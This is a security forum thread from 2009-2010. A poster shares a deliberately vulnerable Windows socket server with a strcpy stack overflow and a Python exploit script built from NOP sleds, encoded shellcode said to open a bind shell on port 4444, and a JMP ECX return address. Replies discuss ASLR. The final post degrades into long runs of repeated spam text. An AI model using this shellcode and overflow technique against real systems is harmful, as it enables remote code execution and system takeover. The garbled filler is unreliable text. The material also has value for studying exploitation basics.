help in writing exploits win32 xp sp2

Networking/Security Forums -> Exploits // System Weaknesses

Author: abhijit_mohanta PostPosted: Wed Jan 21, 2009 8:33 am    Post subject: help in writing exploits win32 xp sp2
    ----
I am bit new to exploitation.But I know the basics.I have to write exploit for the following C code
---------------------------------------------------
Code:
#include <iostream>
#include <winsock.h>
#include <windows.h>

//load windows socket
#pragma comment(lib, "wsock32.lib")

//Define Return Messages
#define SS_ERROR 1
#define SS_OK 0


void pr( char *str)
{   
   char buf[500]="";   
   strcpy(buf,str);
}
void sError(char *str)
{
   MessageBox (NULL, str, "socket Error" ,MB_OK);
   WSACleanup();
}


int main(int argc, char **argv)
{



WORD sockVersion;
WSADATA wsaData;

int rVal;
char Message[5000]="";
char buf[2000]="";   

u_short LocalPort;
LocalPort = 200;

//wsock32 initialized for usage
sockVersion = MAKEWORD(1,1);
WSAStartup(sockVersion, &wsaData);

//create server socket
SOCKET serverSocket = socket(AF_INET, SOCK_STREAM, 0);

if(serverSocket == INVALID_SOCKET)
{
   sError("Failed socket()");
   return SS_ERROR;
}

SOCKADDR_IN sin;
sin.sin_family = PF_INET;
sin.sin_port = htons(LocalPort);
sin.sin_addr.s_addr = INADDR_ANY;

//bind the socket
rVal = bind(serverSocket, (LPSOCKADDR)&sin, sizeof(sin));
if(rVal == SOCKET_ERROR)
{
   sError("Failed bind()");
   WSACleanup();
   return SS_ERROR;
}

//get socket to listen
rVal = listen(serverSocket, 10);
if(rVal == SOCKET_ERROR)
{
   sError("Failed listen()");
   WSACleanup();
   return SS_ERROR;
}

//wait for a client to connect
SOCKET clientSocket;
clientSocket = accept(serverSocket, NULL, NULL);
if(clientSocket == INVALID_SOCKET)
{
   sError("Failed accept()");
   WSACleanup();
   return SS_ERROR;
}

int bytesRecv = SOCKET_ERROR;
while( bytesRecv == SOCKET_ERROR )
{
   //receive the data that is being sent by the client max limit to 5000 bytes.
   bytesRecv = recv( clientSocket, Message, 5000, 0 );
   
   if ( bytesRecv == 0 || bytesRecv == WSAECONNRESET )
   {
      printf( "\nConnection Closed.\n");
      break;
   }
}

//Pass the data received to the function pr
pr(Message);

//close client socket
closesocket(clientSocket);
//close server socket
closesocket(serverSocket);

WSACleanup();

return SS_OK;
}

----------------------------------------------------

I complied the code on devcpp on windows xp sp2 (so no stack protection canarie)
After sending a pattern I find out that ECX points to the first character of our input eip overwritten at 524 bytes.
ESP points to string at the 528 character

so I find a jmp ECX.
and create a pattern like [AAA...524][BBBB][CCCC..]
I find EIP overwritten with BBBB
So in explot I replace BBBB with the address of JMP ECX

So I send the following exploit

C:>python exploit.py|nc localhost 200
exploit.py
-------------------------------------------------------------------------

buffer = '\x90' * 100


buffer += "\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x85"
buffer += "\x3f\x2a\xbd\x83\xeb\xfc\xe2\xf4\x79\x55\xc1\xf0\x6d\xc6\xd5\x42"
buffer += "\x7a\x5f\xa1\xd1\xa1\x1b\xa1\xf8\xb9\xb4\x56\xb8\xfd\x3e\xc5\x36"
buffer += "\xca\x27\xa1\xe2\xa5\x3e\xc1\xf4\x0e\x0b\xa1\xbc\x6b\x0e\xea\x24"
buffer += "\x29\xbb\xea\xc9\x82\xfe\xe0\xb0\x84\xfd\xc1\x49\xbe\x6b\x0e\x95"
buffer += "\xf0\xda\xa1\xe2\xa1\x3e\xc1\xdb\x0e\x33\x61\x36\xda\x23\x2b\x56"
buffer += "\x86\x13\xa1\x34\xe9\x1b\x36\xdc\x46\x0e\xf1\xd9\x0e\x7c\x1a\x36"
buffer += "\xc5\x33\xa1\xcd\x99\x92\xa1\xfd\x8d\x61\x42\x33\xcb\x31\xc6\xed"
buffer += "\x7a\xe9\x4c\xee\xe3\x57\x19\x8f\xed\x48\x59\x8f\xda\x6b\xd5\x6d"
buffer += "\xed\xf4\xc7\x41\xbe\x6f\xd5\x6b\xda\xb6\xcf\xdb\x04\xd2\x22\xbf"
buffer += "\xd0\x55\x28\x42\x55\x57\xf3\xb4\x70\x92\x7d\x42\x53\x6c\x79\xee"
buffer += "\xd6\x6c\x69\xee\xc6\x6c\xd5\x6d\xe3\x57\x3b\xe1\xe3\x6c\xa3\x5c"
buffer += "\x10\x57\x8e\xa7\xf5\xf8\x7d\x42\x53\x55\x3a\xec\xd0\xc0\xfa\xd5"
buffer += "\x21\x92\x04\x54\xd2\xc0\xfc\xee\xd0\xc0\xfa\xd5\x60\x76\xac\xf4"
buffer += "\xd2\xc0\xfc\xed\xd1\x6b\x7f\x42\x55\xac\x42\x5a\xfc\xf9\x53\xea"
buffer += "\x7a\xe9\x7f\x42\x55\x59\x40\xd9\xe3\x57\x49\xd0\x0c\xda\x40\xed"
buffer += "\xdc\x16\xe6\x34\x62\x55\x6e\x34\x67\x0e\xea\x4e\x2f\xc1\x68\x90"
buffer += "\x7b\x7d\x06\x2e\x08\x45\x12\x16\x2e\x94\x42\xcf\x7b\x8c\x3c\x42"
buffer += "\xf0\x7b\xd5\x6b\xde\x68\x78\xec\xd4\x6e\x40\xbc\xd4\x6e\x7f\xec"
buffer += "\x7a\xef\x42\x10\x5c\x3a\xe4\xee\x7a\xe9\x40\x42\x7a\x08\xd5\x6d"
buffer += "\x0e\x68\xd6\x3e\x41\x5b\xd5\x6b\xd7\xc0\xfa\xd5\x75\xb5\x2e\xe2"
buffer += "\xd6\xc0\xfc\x42\x55\x3f\x2a\xbd"

buffer += '\x90' * 100
buffer += '\xC3\x2C\x82\x77' #jmp ECX
buffer += '\x90'*100

print buffer


#jmp eax 77822CC3,7C85D2F4 shellcode size 324 eip overwrites at 524
-----------------------------------------------------------
The above shellcode is for tcp connect opens a port at 4444.I have tested the shellcode.It works fine .
But I dont find the exploit working.
I simply crashes the program.
Please suggest me why so.

Please help as soon as possible
I have tested the shellcode

Moderator note: added code tags - capi

Author: clonmac PostPosted: Mon Apr 13, 2009 5:54 pm    Post subject:
    ----
Have you varified that the computer running the process is not using address space layout randomization (ASLR)?

When you debug to find the values of eip, debug several times to ensure that the eip location stays the same each time you run it. If it changes every time, then the computer is using ASLR which means that your exploit the way it is written won't work. There are ways around ASLR though.

Author: c0d3r PostPosted: Wed Jul 22, 2009 12:14 pm    Post subject: Re: help in writing exploits win32 xp sp2
    ----
Did you manage to get it to work ?

Moderator note: removed full quote of lengthy original post - capi

Author: reitchelazan PostPosted: Sun May 30, 2010 3:53 pm    Post subject:
    ----
I'm new in c++ I have tryed out rhis code but it get too many errors Sad I give up.
y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62
y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62
y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62
y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62
y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62
y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62y62
y62y62y62y62y62y62y62y62y62y62y62y62y62
инфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфо
инфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфо
инфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфо
инфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфо
инфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфо
инфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфо
инфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфо
инфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфо
инфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфо



Networking/Security Forums -> Exploits // System Weaknesses


output generated using printer-friendly topic mod, All times are GMT + 2 Hours

Page 1 of 1

Powered by phpBB 2.0.x © 2001 phpBB Group